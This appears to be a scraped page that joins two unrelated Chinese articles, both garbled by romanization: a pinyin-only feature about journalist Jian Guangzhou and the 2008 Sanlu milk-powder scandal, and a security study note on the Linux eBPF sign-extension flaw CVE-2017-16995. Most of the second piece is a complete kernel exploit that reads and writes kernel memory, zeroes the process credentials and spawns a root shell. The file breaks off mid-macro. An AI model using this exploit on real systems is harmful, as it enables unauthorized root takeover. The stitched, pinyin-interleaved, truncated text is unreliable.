15nianqian,nagejielu“sanlunaifen”deshanghaijizhejianguangzhou,rujinzenmeyangliao?shoufa2023-11-09 16:26·qindianlishi【neironglaiyuanyuduzhetougao】2023nian,sanlunaifenchuxianzairuidian“exinshiwubowuguan”dexiaoxishangliaoresou,zaidujiangrenmenlahuiliaoyaoyuande2008nian。shuoqisanlunaifen,jiubudebutijianguangzhou。zuoweibidaxiongmaohuanxishaode“diaochajizhe”,jianguangzhouyinsanlunaifenhenhenchuliaoyibamingqi,kesuizhierlaiderongyuquedaizhuokekedemuguang,yijiqianzaideeshiliweixie。yushi,jianguangzhouciquliaojizhegongzuo,zhuanerfazhanzimeiti,rujindetazaiqitaxingyeyouyoushimechengjiune?sanlunaifenpuguang2008nian,chuliaorangquanguobeitongwanfendezuochuandadizhen,huanyouyigerenweizaochengde“dizhen”,najiushisanlunaifen。shijianbeijieluqianxi...jianguangzhoubingbushidiyigefaxiansanlunaifenyouwentidejizhe,zhishinaxierenzenmeyexiangbudao,yigedapainaifenhuirucide“du”。2008nian5yuefen,yigetiezichuxianzaitianyawangzhanshang《zhezhongnaifennengyonglaijiuzai?》zheshiyigemingjiaowangyuanpingdemuqinfachudewenzhang。tazishunverzicongheliaosanluzhihou,bujinjingchangladuzi,erqieniaoyezhanchouchuxianliaoxixiaodekeli,zheweimuqinganjingeinvertingheliao。jiuzaizheyinian,dianshishangbobaoliaosanlunaifengeizuochuanzaiqujuanzengliao880wandeyingyouernaifen、yiji20wanyuandeyetinai。zherangwangyuanpingshifenfennu,sanlunaifenzhiliangzhemechahuanganjuangeizaiqu?tajuedingzaiwangshangjielusanlu,yexiwangzhidaoyouduoshaorenhewansanluhuichuxianzhezhongqingkuang,yushixiexialiaogaiwenzhang。10tianhou,sanlunaifenfuzerenzhaodaowangyuanping,jiangwentiguiyubanbenfangmian,xiangyaoyongjiazhi2000duoyuandegebanxinnaiqudewangyuanpingdeyuanliang。jiayipeishiyejiushizheyangliao,wangyuanpingmeixiangtaiduojiudayingliao。wangyuanpingyiweishiyigexiaoxiaodezhiliangwenti,huozheshihaizichiliaohuishanghuozhileide,yaoburannalihuanganshousanludenai?shuidumeixiangdaodeshi,zhejingranshisanluguanyongdeshouduan!zaozai2004nian,jiuchuxianliaotoudashenzixiaodeyingyoueryinweishenjieshisiwang,yuanyiweishiguaibing。kegansushengyimingminiaokeyishengzhangwei,zaizixunliaoduogehuanyoushenjieshideertongjiachanghou,jiandingdezhichu,jiushisanlunaifenyouwenti。nashihousanludemingqihenda,henduojizhejishizhidaoliaozhejianshi,yebuganzhijiedianchusanlunaifenyouwenti。diaochajizhejianguangzhouzaibaodaoqian,yeshiwanfenjiujie。bishidesanlushizhongguonaifenxingyededaqiye,huanshizhongguohangtianyuanzhongxinde“weiyihezuohuoban”。keyixiangdaoruguobuzhichulai,huiyougengduodejiatinghehaiziyincishoushang,jianguangzhoujuederuguobushuoduibuqizijideshenfen。08nian9yue1ri,jianguangzhouzhijiedianchu“sanlunaifendaming”,jiangdatouyingerdezhaopianchiluoluodefangdaozhongrenyanqian。yuanbenhuanyiweibuhuiyinqishimeshuihua,jieguojingranxianqiliaonaifenjiededadizhen!henduorenzaibuzhiqingdeshihou,fenfenzhizejianguangzhou,zenmenengruciwumiesanlunaifen?sanlujuannameduoqian 、sanluhuanshihangtianyuanzhidingnai,sanlushiguoneinaizhipindapai...diaochajieguochulaihou,dajiaduzhenjingliao,sanlujingranzainaifenzhongfangruliaochaobiao1000duobeidesanjuqingan,guojiaguidingshimeigongjin15haoke,ersanlumeigongjinnaifenhanyou2563haoke。chao29wanyingyouerbeichachuhuanyoushenjieshi,zhengzhuangyanzhongdaozhisiwangdeyou6ren。yaozhidaozhexiehaizidushiguojiadexiwang,zhemeduohaizihuanbing,youjianghuiyouduoshaogejiatingyincixianrujuewangne?youdehaizixuyaozuoyibeizideshentouxi,ketamendepeichangjinjinwei2000yuanzuoyou,huanyouhenduohaizilianpeichangjindunabudao。zuoweidiyigeganjielu“sanlunaifenyouwenti”deren,jianguangzhouyixiazijiuhuoliao!shehuijiangjianguangzhougaogaopengqi,chengtawei“minshengzhiguang”。tayeronghuoliao“2008zhongguojiaozixinruibangnianduxinruirenwu”,zherangjianguangzhougengjiayoudongliheshehuiandianzuodouzheng。jianguangzhouhuanjieludeexingshijianjianguangzhoucongyejizheshiyunian,jieluguobushaoshehuishangdeheianshijian,xiangshizhilizhangaidenvhaibeiqiechuzigongdeshijianjiushitahetongshiyiqibaochulaide。yinweijielusanlunaifendahuohou,jianguangzhouyinglailiaoduanzandeshiyezuofengqi,kehenkuaiyoubeilaxia“shentai”。2009nian,taxianshifabuliaoyipian:《dianjizhiwangzuobeijiaotingjiachangyoukuyaosu》debaodao。zhepianwenzhangbenshenxiedeshiweishengbujiaotingyangyongxinshiyongdianjizhiliaowangzuo,zaidangshibingmeiyouyinqishimeshuihua。kesuihou,jianguangzhouzaixunfangliaoyixiejianghaizisongdaoyangyongxinjiewangzuoxuexiaodejiachanghou,youjielianchuliaojipian:《ranghaizishoudianjizongbizuolaoqiang》、《ganglaidewozhiyourouti,yangshugeiliaowolinghun》。zhexiewenzhangyu“shengtaoyangyongxin”deshehuilichangfashengliaomaodun。xuduorendushuo,jianguangzhoushipianliliaochuxin,weishimeyaoweiyangyongxinnazhongemobianjie?zhejianshiduijianguangzhoudechongjilihenda,tazaiwangyoumendeshengtaobifaxiachenjiliao。erzhanzaiwomenputongrendelichang,wangzuohuanzhezaoxienianqueshibaochuguohenduopianjishijian。yexuyangyongxindejieduanxuexiaoqueshijiangyixiewangzuohuanzheconghuanxiangzhongjiaoxingliao,dangengduodehaiziqueyinciyouliaoxindezuomengkejiuyizhaoshishilaishuo,suoweidedianjijiewangzuo,hechangbushilingwaiyizhongsixingzhemo?duiyushehuidetaofa,jianguangzhoumeiyouguoduodefanbo,yemeiyouliuxiazhejianshigengduodekanfa。2012nian8yue30ri,jianguangzhoujuedingcong《dongfangzaobao》cizhi,liuxiayijuhua:lixiangyisi,woxiancheliao,xiongdimenzhenzhong!suihoujinjunzimeiti,huoyuezaiwangluoshang。jianguangzhouhejigepengyouyiqichuangbanliaohuanzhichuanmei,daochuxuexihejingyinggongsi。2018he2022nian,taduzengchumianbiaodaliaozijiduimeitixinwenjiedekanfa,houlaihuanjinzhuliaodouyinduanshipinpingtai。zai2023nian,AIxiezuochongjimeitiquan,jianguangzhouzaicixianshenbiaodakanfa:AIwufaqudaimeitiren。zaijianguangzhouxinli,xinwenjiushiyou“redu”de,xuyaorenzhudongquwajuehefaxiande,zhebushibinglengwuganqingdejiqikeyidaitide。youyupingtaiguize,zhiyoudangningenwoyougengduohudongdeshihou,caihuibeirendingweitiefen。ruguoninxihuanwodewenzhang,keyidiange“guanzhu”,chengweitiefenhounengdiyishijianshoudaowenzhangtuisong。daifuaishangliaoqianshui!
CVE-2017-16995 ebpf 符(Fu)号(Hao)扩(Kuo)展(Zhan)漏(Lou)洞(Dong)学(Xue)习(Xi)笔(Bi)记(Ji)2020-04-10 14:07·粥(Zhou)粥(Zhou)学(Xue)安(An)全(Quan)今(Jin)天(Tian)的(De)文(Wen)章(Zhang)是(Shi) i 春(Chun)秋(Qiu)论(Lun)坛(Tan)作(Zuo)者(Zhe)PwnRabb1t原(Yuan)创(Chuang)的(De)文(Wen)章(Zhang),关(Guan)于(Yu)CVE-2017-16995 ebpf 符(Fu)号(Hao)扩(Kuo)展(Zhan)漏(Lou)洞(Dong)的(De)学(Xue)习(Xi)笔(Bi)记(Ji),文(Wen)章(Zhang)篇(Pian)幅(Fu)较(Jiao)长(Chang),阅(Yue)读(Du)约(Yue)12分(Fen)钟(Zhong),文(Wen)章(Zhang)未(Wei)经(Jing)许(Xu)可(Ke)禁(Jin)止(Zhi)转(Zhuan)载(Zai)!漏(Lou)洞(Dong)分(Fen)析(Xi)关(Guan)于(Yu)这(Zhe)个(Ge)漏(Lou)洞(Dong)网(Wang)上(Shang)已(Yi)经(Jing)有(You)很(Hen)多(Duo)的(De)文(Wen)章(Zhang)分(Fen)析(Xi)了(Liao),这(Zhe)里(Li)不(Bu)做(Zuo)太(Tai)多(Duo)描(Miao)述(Shu),只(Zhi)记(Ji)录(Lu)一(Yi)些(Xie)比(Bi)较(Jiao)重(Zhong)要(Yao)的(De)点(Dian)。首(Shou)先(Xian)是(Shi)ebpf,上(Shang)一(Yi)张(Zhang)图(Tu):ebpf首(Shou)先(Xian)需(Xu)要(Yao)ring3传(Chuan)入(Ru)一(Yi)段(Duan)指(Zhi)令(Ling)(传(Chuan)到(Dao)JIT),它(Ta)会(Hui)在(Zai)BPF_PROG_RUN里(Li)做(Zuo)包(Bao)过(Guo)滤(Lv), 内(Nei)核(He)会(Hui)申(Shen)请(Qing)一(Yi)块(Kuai)共(Gong)享(Xiang)内(Nei)存(Cun)(MAP),内(Nei)核(He)的(De)数(Shu)据(Ju)经(Jing)过(Guo)过(Guo)滤(Lv)之(Zhi)后(Hou)放(Fang)到(Dao)MAP里(Li)面(Mian),然(Ran)后(Hou)ring3就(Jiu)可(Ke)以(Yi)读(Du)写(Xie)MAP来(Lai)获(Huo)取(Qu)内(Nei)核(He)数(Shu)据(Ju)。这(Zhe)个(Ge)漏(Lou)洞(Dong)简(Jian)单(Dan)来(Lai)说(Shuo)就(Jiu)是(Shi)符(Fu)号(Hao)扩(Kuo)展(Zhan)没(Mei)有(You)检(Jian)查(Cha)好(Hao),像(Xiang)前(Qian)面(Mian)说(Shuo)的(De),ebpf分(Fen)成(Cheng)verifier和(He)BPF_PROG_RUN 两(Liang)个(Ge)部(Bu)分(Fen)。传(Chuan)入(Ru)的(De)指(Zhi)令(Ling)其(Qi)实(Shi)就(Jiu)是(Shi)原(Yuan)本(Ben)x64上(Shang)指(Zhi)令(Ling)的(De)一(Yi)个(Ge)映(Ying)射(She),它(Ta)会(Hui)检(Jian)查(Cha)指(Zhi)令(Ling)的(De)CFG,是(Shi)不(Bu)是(Shi)有(You)非(Fei)法(Fa)内(Nei)存(Cun)访(Fang)问(Wen)之(Zhi)类(Lei)的(De)(如(Ru)果(Guo)可(Ke)以(Yi)的(De)话(Hua)就(Jiu)直(Zhi)接(Jie)是(Shi)内(Nei)核(He)代(Dai)码(Ma)注(Zhu)入(Ru)了(Liao),可(Ke)以(Yi)任(Ren)意(Yi)执(Zhi)行(Xing)代(Dai)码(Ma)),效(Xiao)率(Lv)上(Shang)的(De)考(Kao)虑(Lv),会(Hui)忽(Hu)略(Lue)掉(Diao)一(Yi)些(Xie)分(Fen)支(Zhi)的(De)检(Jian)查(Cha),像(Xiang)下(Xia)面(Mian)这(Zhe)样(Yang),r9的(De)值(Zhi)固(Gu)定(Ding)是(Shi)0xffffffff,那(Na)么(Me)就(Jiu)不(Bu)会(Hui)跳(Tiao)转(Zhuan)到(Dao)[4]的(De)部(Bu)分(Fen),所(Suo)以(Yi)就(Jiu)不(Bu)用(Yong)检(Jian)查(Cha)它(Ta)了(Liao),节(Jie)省(Sheng)时(Shi)间(Jian)。 ALU_MOV_K(9,0xffffffff), // [0] r9 = 0xffffffff JMP_JNE_K(9,0xffffffff,2), // [1] if r9 != 0xffffffff: jmp [4] ALU64_MOV_K(0,0x0), // [2] r0 = 0 JMP_EXIT(), // [3] exit LD_IMM_DW(9,1,3), // [4] r9 = mapfd BPF_INSN_NEG, // [5] //r6 = map[0] ALU64_MOV_X(1,9), // [6] r1 = r9 ALU64_MOV_X(2,10), // [7] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [8] r2 = r2 -4首(Shou)先(Xian)看(Kan)上(Shang)面(Mian)第(Di)一(Yi)条(Tiao)指(Zhi)令(Ling)ALU_MOV_K(9,0xffffffff),它(Ta)等(Deng)效(Xiao)于(Yu)r9 = 0xffffffff,对(Dui)应(Ying)的(De)代(Dai)码(Ma)在(Zai):https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1782 if (class == BPF_ALU || class == BPF_ALU64) { err = check_alu_op(env, insn); if (err) return err; } else if (class == BPF_LDX) {调(Diao)用(Yong)check_alu_op函(Han)数(Shu),最(Zui)后(Hou)调(Diao)用(Yong)regs[insn->dst_reg].imm = insn->imm;,这(Zhe)里(Li)的(De)立(Li)即(Ji)数(Shu)是(Shi)用(Yong)signed int保(Bao)存(Cun)的(De)。//ptype struct reg_statetype = struct reg_state { enum bpf_reg_type type; union { int imm; struct bpf_map *map_ptr; };}///* check validity of 32-bit and 64-bit arithmetic operations */static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn){ struct reg_state *regs = env->cur_state.regs; u8 opcode = BPF_OP(insn->code); int err;//... } else if (opcode == BPF_MOV) {//.. if (BPF_SRC(insn->code) == BPF_X) { //... } else {// BPF_K <=========================================== /* case: R = imm * remember the value we stored into this reg */ regs[insn->dst_reg].type = CONST_IMM; regs[insn->dst_reg].imm = insn->imm;//32bit <- 32bit }//... return 0;}然(Ran)后(Hou)第(Di)二(Er)条(Tiao)指(Zhi)令(Ling)JMP_JNE_K(9,0xffffffff,2),其(Qi)检(Jian)查(Cha)在(Zai)check_cond_jmp_op函(Han)数(Shu)里(Li),这(Zhe)时(Shi)候(Hou)用(Yong)的(De)imm依(Yi)然(Ran)是(Shi)signed int类(Lei)型(Xing),然(Ran)后(Hou)后(Hou)续(Xu)检(Jian)查(Cha)的(De)时(Shi)候(Hou)发(Fa)现(Xian)前(Qian)面(Mian)r9和(He)JMP_JNE_K的(De)imm一(Yi)样(Yang),于(Yu)是(Shi)就(Jiu)不(Bu)去(Qu)检(Jian)查(Cha)[4]开(Kai)始(Shi)的(De)指(Zhi)令(Ling)了(Liao)。/* ptype struct reg_statetype = struct reg_state { enum bpf_reg_type type; union { int imm; struct bpf_map *map_ptr; };}*/static int check_cond_jmp_op(struct verifier_env *env, struct bpf_insn *insn, int *insn_idx){ struct reg_state *regs = env->cur_state.regs; struct verifier_state *other_branch; u8 opcode = BPF_OP(insn->code); int err; //.... } else if (BPF_SRC(insn->code) == BPF_K && (opcode == BPF_JEQ || opcode == BPF_JNE)) { if (opcode == BPF_JEQ) { //... } else { /* detect if (R != imm) goto * and in the fall-through state recognize that R = imm */ regs[insn->dst_reg].type = CONST_IMM; regs[insn->dst_reg].imm = insn->imm; } } if (log_level) print_verifier_state(env); return 0;}然(Ran)后(Hou)到(Dao)了(Liao)运(Yun)行(Xing)的(De)之(Zhi)后(Hou),对(Dui)应(Ying)__bpf_prog_run 函(Han)数(Shu):https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c#L195ALU_MOV_K:DST=(u32)IMM这(Zhe)个(Ge)时(Shi)候(Hou)DST=0xffffffffJMP_JNE_K:比(Bi)较(Jiao)DST和(He)IMM,此(Ci)时(Shi)IMM是(Shi)signed int类(Lei)型(Xing),DST 是(Shi) uint64_t 类(Lei)型(Xing), IMM会(Hui)做(Zuo)位(Wei)扩(Kuo)展(Zhan),原(Yuan)来(Lai)的(De)0xffffffff也(Ye)就(Jiu)是(Shi)-1变(Bian)成(Cheng)0xffffffff ffffffff,0xffffffff != 0xffffffff ffffffff,于(Yu)是(Shi)就(Jiu)会(Hui)跳(Tiao)到(Dao)前(Qian)面(Mian)指(Zhi)令(Ling)的(De)LD_IMM_DW(9,1,3), // [4] r9=mapfd开(Kai)始(Shi)执(Zhi)行(Xing),verifrier的(De)时(Shi)候(Hou)并(Bing)没(Mei)有(You)这(Zhe)一(Yi)段(Duan)指(Zhi)令(Ling)做(Zuo)检(Jian)查(Cha),这(Zhe)时(Shi)候(Hou)就(Jiu)可(Ke)以(Yi)在(Zai)内(Nei)核(He)做(Zuo)任(Ren)意(Yi)代(Dai)码(Ma)执(Zhi)行(Xing)了(Liao)。#define DST regs[insn->dst_reg] // uint64_t#define SRC regs[insn->src_reg] // uint64_t#define FP regs[BPF_REG_FP] #define ARG1 regs[BPF_REG_ARG1] #define CTX regs[BPF_REG_CTX] #define IMM insn->imm // signed int //..static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn){ u64 stack[MAX_BPF_STACK / sizeof(u64)]; u64 regs[MAX_BPF_REG], tmp;//..... ALU_MOV_K: DST = (u32) IMM; CONT;//... JMP_JNE_K: if (DST != IMM) { insn += insn->off; CONT_JMP; } CONT;//...}我(Wo)们(Men)可(Ke)以(Yi)写(Xie)一(Yi)段(Duan)代(Dai)码(Ma)验(Yan)证(Zheng)一(Yi)下(Xia):#include #include #include #include #include int main(int argc,char **argv){ setbuf(stdout,0); int imm = 0xffffffff; uint64_t dst = (uint32_t)0xffffffff; if( dst != imm){ printf("vuln\n"); } return 0;}输(Shu)出(Chu)的(De)结(Jie)果(Guo)是(Shi)vuln,接(Jie)下(Xia)来(Lai)是(Shi)如(Ru)何(He)利(Li)用(Yong)。漏(Lou)洞(Dong)利(Li)用(Yong)漏(Lou)洞(Dong)利(Li)用(Yong)的(De)话(Hua),前(Qian)面(Mian)的(De)分(Fen)析(Xi)我(Wo)们(Men)知(Zhi)道(Dao)可(Ke)以(Yi)在(Zai)内(Nei)核(He)任(Ren)意(Yi)代(Dai)码(Ma)执(Zhi)行(Xing),手(Shou)写(Xie)ebpf的(De)指(Zhi)令(Ling)(其(Qi)实(Shi)就(Jiu)和(He)我(Wo)们(Men)手(Shou)写(Xie)汇(Hui)编(Bian)一(Yi)样(Yang)),基(Ji)本(Ben)利(Li)用(Yong)思(Si)路(Lu)如(Ru)下(Xia):泄(Xie)露(Lu)出(Chu)task_struct的(De)地(Di)址(Zhi)借(Jie)助(Zhu)task_struct地(Di)址(Zhi)泄(Xie)露(Lu)出(Chu)cred地(Di)址(Zhi)直(Zhi)接(Jie)内(Nei)存(Cun)写(Xie)改(Gai)uid,gid,然(Ran)后(Hou)/bin/sh getshell复(Fu)现(Xian)的(De)环(Huan)境(Jing)我(Wo)用(Yong)的(De)内(Nei)核(He)是(Shi)4.4.110版(Ban)本(Ben), 附(Fu)件(Jian)中(Zhong)有(You)我(Wo)的(De)config文(Wen)件(Jian),主(Zhu)要(Yao)是(Shi)加(Jia)上(Shang)CONFIG_BPF=y 和(He)CONFIG_BPF_SYSCALL=y这(Zhe)里(Li)使(Shi)用(Yong)的(De)bpf指(Zhi)令(Ling)如(Ru)下(Xia),参(Can)照(Zhao)panda师(Shi)傅(Fu)的(De)分(Fen)析(Xi): ALU_MOV_K(9,0xffffffff), // [0] r9 = 0xffffffff JMP_JNE_K(9,0xffffffff,2), // [1] if r9 != 0xffffffff: jmp [4] ALU64_MOV_K(0,0x0), // [2] r0 = 0 JMP_EXIT(), // [3] exit// 下(Xia)面(Mian)指(Zhi)令(Ling)不(Bu)会(Hui)做(Zuo)检(Jian)查(Cha) LD_IMM_DW(9,1,3), // [4] r9 = mapfd BPF_INSN_NEG, // [5] padding //r6 = map[0] ALU64_MOV_X(1,9), // [6] r1 = r9 ALU64_MOV_X(2,10), // [7] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [8] r2 = r2 -4 ST_MEM_W(10,-4,0), // [9] [r10 - 4] =0//fixup_bpf_calls JMP_CALL(BPF_FUNC_map_lookup_elem),// [10] map_lookup_elem JMP_JNE_K(0,0,1), // [11] if r0 != 0 : jmp [13] JMP_EXIT(), // [12] exit LDX_MEM_DW(6,0,0), // [13] r6 = [r0] // r7 =map[1] ALU64_MOV_X(1,9), // [14] r1 = r9 ALU64_MOV_X(2,10), // [15] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [16] r2 = r2 -4 ST_MEM_W(10,-4,1), // [17] [r10 - 4] =0 JMP_CALL(BPF_FUNC_map_lookup_elem),// [18] map_lookup_elem JMP_JNE_K(0,0,1), // [19] if r0 != 0 : jmp [21] JMP_EXIT(), // [20] exit LDX_MEM_DW(7,0,0), // [21] r7 = [r0] // r8=map[2] ALU64_MOV_X(1,9), // [22] r1 = r9 ALU64_MOV_X(2,10), // [23] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [24] r2 = r2 -4 ST_MEM_W(10,-4,2), // [25] [r10 - 4] =0 JMP_CALL(BPF_FUNC_map_lookup_elem),// [26] map_lookup_elem JMP_JNE_K(0,0,1), // [27] if r0 != 0 : jmp [29] JMP_EXIT(), // [28] exit LDX_MEM_DW(8,0,0), // [29] r8 = [r0] ALU64_MOV_X(2,0), // [30] r2 = r0 ALU64_MOV_K(0,0), // [31] r0 = 0// map[0] == 0 任(Ren)意(Yi)地(Di)址(Zhi)读(Du) JMP_JNE_K(6,0,3), // [32] if r6 !=0: jmp [36] LDX_MEM_DW(3,7,0), // [33] r3 = [r7] (map[1]) STX_MEM_DW(2,0,3), // [34] [r2] = r3 JMP_EXIT(), // [35] exit// map[0] == 1 leak rbp addr JMP_JNE_K(6,1,2), // [36] if r6 !=1: jmp [39] STX_MEM_DW(2,0,10), // [37] [r2] = r10 (rbp) JMP_EXIT(), // [38] exit// map[0] == 2 任(Ren)意(Yi)地(Di)址(Zhi)写(Xie) STX_MEM_DW(7,0,8), // [39] [r7] = r8 JMP_EXIT(), // [40] exit首(Shou)先(Xian)是(Shi)r6=map[0],r7=map[1],r8=map[2] (map 是(Shi)前(Qian)面(Mian)提(Ti)到(Dao)的(De)共(Gong)享(Xiang)内(Nei)存(Cun))然(Ran)后(Hou)是(Shi)三(San)个(Ge)判(Pan)断(Duan):map[0]==0时(Shi),根(Gen)据(Ju) map[1] 的(De)值(Zhi)来(Lai)读(Du)内(Nei)存(Cun);map[0]==1时(Shi),获(Huo)取(Qu)rbp的(De)值(Zhi)==>addr & ~(0x4000 - 1); 可(Ke)以(Yi)读(Du)取(Qu)到(Dao) task_struct 的(De)地(Di)址(Zhi);map[0] ==2时(Shi),*map[1]= map[2]([r7]=r8)。exp完(Wan)整(Zheng)exp 如(Ru)下(Xia) , exp.c#define _GNU_SOURCE#include #include #include #include #include #include #include #include #include #include #include #include "bpf_insn_helper.h"typedef uint32_t u32;typedef int32_t s32;typedef uint64_t u64;typedef int64_t s64;void logs(char *tag,char *buf){ printf("[ s]: "); printf(" %s ",tag); printf(": %s\n",buf);}void logx(char *tag,uint32_t num){ printf("[ x] "); printf(" %-20s ",tag); printf(": %-#8x\n",num);}void loglx(char *tag,uint64_t num){ printf("[lx] "); printf(" %-20s ",tag); printf(": %-#16lx\n",num);}void bp(char *tag){ printf("[bp] : %s\n",tag); getchar();}void init(){ setbuf(stdin,0); setbuf(stdout,0);}int mapfd,progfd;int sockets[2];#define LOG_BUF_SIZE 65536#define PROGSIZE 328#define PHYS_OFFSET 0xffff880000000000#define CRED_OFFSET 0x5b0 //0x5f8#define UID_OFFSET 0x4char bpf_log_buf[LOG_BUF_SIZE];static int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version) { union bpf_attr attr = { .prog_type = prog_type, .insns = (__u64)insns, .insn_cnt = prog_len / sizeof(struct bpf_insn), .license = (__u64)license, .log_buf = (__u64)bpf_log_buf, .log_size = LOG_BUF_SIZE, .log_level = 1, }; attr.kern_version = kern_version; bpf_log_buf[0] = 0; return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));}static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, int max_entries) { union bpf_attr attr = { .map_type = map_type, .key_size = key_size, .value_size = value_size, .max_entries = max_entries }; return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));}static int bpf_update_elem(uint64_t key, uint64_t value) { union bpf_attr attr = { .map_fd = mapfd, .key = (__u64)&key, .value = (__u64)&value, .flags = 0, }; return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));}static int bpf_lookup_elem(void *key, void *value) { union bpf_attr attr = { .map_fd = mapfd, .key = (__u64)key, .value = (__u64)value, }; return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));}static void __exit(char *err) { fprintf(stderr, "error: %s\n", err); exit(-1);}static void writemsg(void) { char buffer[64]; ssize_t n = write(sockets[0], buffer, sizeof(buffer)); if (n < 0) { perror("write"); return; } if (n != sizeof(buffer)) fprintf(stderr, "short write: %lu\n", n);}#define __update_elem(a, b, c) \ bpf_update_elem(0, (a)); \ bpf_update_elem(1, (b)); \ bpf_update_elem(2, (c)); \ writemsg();static uint64_t get_value(int key) { uint64_t value; if (bpf_lookup_elem(&key, &value)) __exit(strerror(errno)); return value;}static uint64_t __get_fp(void) { __update_elem(1, 0, 0); return get_value(2);}static uint64_t __read(uint64_t addr) { __update_elem(0, addr, 0); return get_value(2);}static void __write(uint64_t addr, uint64_t val) { __update_elem(2, addr, val);}static uint64_t get_sp(uint64_t addr) { return addr & ~(0x4000 - 1);}static void pwn(void) { printf("pwning\n"); uint64_t fp, sp, task_struct, credptr, uidptr; fp = __get_fp(); loglx("fpsome",fp); if (fp < PHYS_OFFSET) __exit("bogus fp"); sp = get_sp(fp); if (sp < PHYS_OFFSET) __exit("bogus sp"); task_struct = __read(sp); if (task_struct < PHYS_OFFSET) __exit("bogus task ptr"); printf("task_struct = %lx\n", task_struct); credptr = __read(task_struct + CRED_OFFSET); // cred if (credptr < PHYS_OFFSET) __exit("bogus cred ptr"); uidptr = credptr + UID_OFFSET; // uid /*uidptr = credptr + 4; // uid*/ if (uidptr < PHYS_OFFSET) __exit("bogus uid ptr"); printf("uidptr = %lx\n", uidptr); __write(uidptr, 0); __write(uidptr+0x8, 0); __write(uidptr+0x10, 0); if (geteuid() == 0) { printf("spawning root shell\n"); system("/bin/sh"); exit(0); } __exit("not vulnerable?");}int main(int argc,char **argv){ init(); struct bpf_insn insns[] = { ALU_MOV_K(9,0xffffffff), // [0] r9 = 0xffffffff JMP_JNE_K(9,0xffffffff,2), // [1] if r9 != 0xffffffff: jmp [4] ALU64_MOV_K(0,0x0), // [2] r0 = 0 JMP_EXIT(), // [3] exit LD_IMM_DW(9,1,3), // [4] r9 = mapfd BPF_INSN_NEG, // [5] //r6 = map[0] ALU64_MOV_X(1,9), // [6] r1 = r9 ALU64_MOV_X(2,10), // [7] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [8] r2 = r2 -4 ST_MEM_W(10,-4,0), // [9] [r10 - 4] =0 JMP_CALL(BPF_FUNC_map_lookup_elem),// [10] map_lookup_elem JMP_JNE_K(0,0,1), // [11] if r0 != 0 : jmp [13] JMP_EXIT(), // [12] exit LDX_MEM_DW(6,0,0), // [13] r6 = [r0] // r7 =map[1] ALU64_MOV_X(1,9), // [14] r1 = r9 ALU64_MOV_X(2,10), // [15] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [16] r2 = r2 -4 ST_MEM_W(10,-4,1), // [17] [r10 - 4] =0 JMP_CALL(BPF_FUNC_map_lookup_elem),// [18] map_lookup_elem JMP_JNE_K(0,0,1), // [19] if r0 != 0 : jmp [21] JMP_EXIT(), // [20] exit LDX_MEM_DW(7,0,0), // [21] r7 = [r0] // r8=map[2] ALU64_MOV_X(1,9), // [22] r1 = r9 ALU64_MOV_X(2,10), // [23] r2 = r10 (rbp) ALU64_ADD_K(2,-4), // [24] r2 = r2 -4 ST_MEM_W(10,-4,2), // [25] [r10 - 4] =0 JMP_CALL(BPF_FUNC_map_lookup_elem),// [26] map_lookup_elem JMP_JNE_K(0,0,1), // [27] if r0 != 0 : jmp [29] JMP_EXIT(), // [28] exit LDX_MEM_DW(8,0,0), // [29] r8 = [r0] ALU64_MOV_X(2,0), // [30] r2 = r0 ALU64_MOV_K(0,0), // [31] r0 = 0 JMP_JNE_K(6,0,3), // [32] if r6 !=0: jmp [36] LDX_MEM_DW(3,7,0), // [33] r3 = [r7] (map[1]) STX_MEM_DW(2,0,3), // [34] [r2] = r3 JMP_EXIT(), // [35] exit JMP_JNE_K(6,1,2), // [36] if r6 !=1: jmp [39] STX_MEM_DW(2,0,10), // [37] [r2] = r10 JMP_EXIT(), // [38] exit STX_MEM_DW(7,0,8), // [39] [r7] = r8 JMP_EXIT(), // [40] exit }; /*for(int i=0;i#define ALU_NEG BPF_ALU | BPF_NEG#define ALU_END_TO_BE BPF_ALU | BPF_END | BPF_TO_BE #define ALU_END_TO_LE BPF_ALU | BPF_END | BPF_TO_LE #define F_ALU64_ARSH_XBPF_ALU64 | BPF_ARSH | BPF_X#define F_ALU64_ARSH_KBPF_ALU64 | BPF_ARSH | BPF_K#define F_ALU64_NEG BPF_ALU64 | BPF_NEG #define BPF_INSN_NEG \ ((struct bpf_insn) { \ .code = 0, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 \ })#define ALU_OP_K(OP,DST,IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM \ })#define ALU_OP_X(OP,DST,SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 \ })#define ALU64_OP_K(OP,DST,IMM) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = 0, \ .imm = IMM \ })#define ALU64_OP_X(OP,DST,SRC) \ ((struct bpf_insn) { \ .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = 0, \ .imm = 0 \ })#define ALU_ADD_K(DST,IMM) ALU_OP_K(BPF_ADD,DST,IMM)#define ALU_SUB_K(DST,IMM) ALU_OP_K(BPF_SUB,DST,IMM)#define ALU_AND_K(DST,IMM) ALU_OP_K(BPF_AND,DST,IMM)#define ALU_OR_K(DST,IMM) ALU_OP_K(BPF_OR,DST,IMM)#define 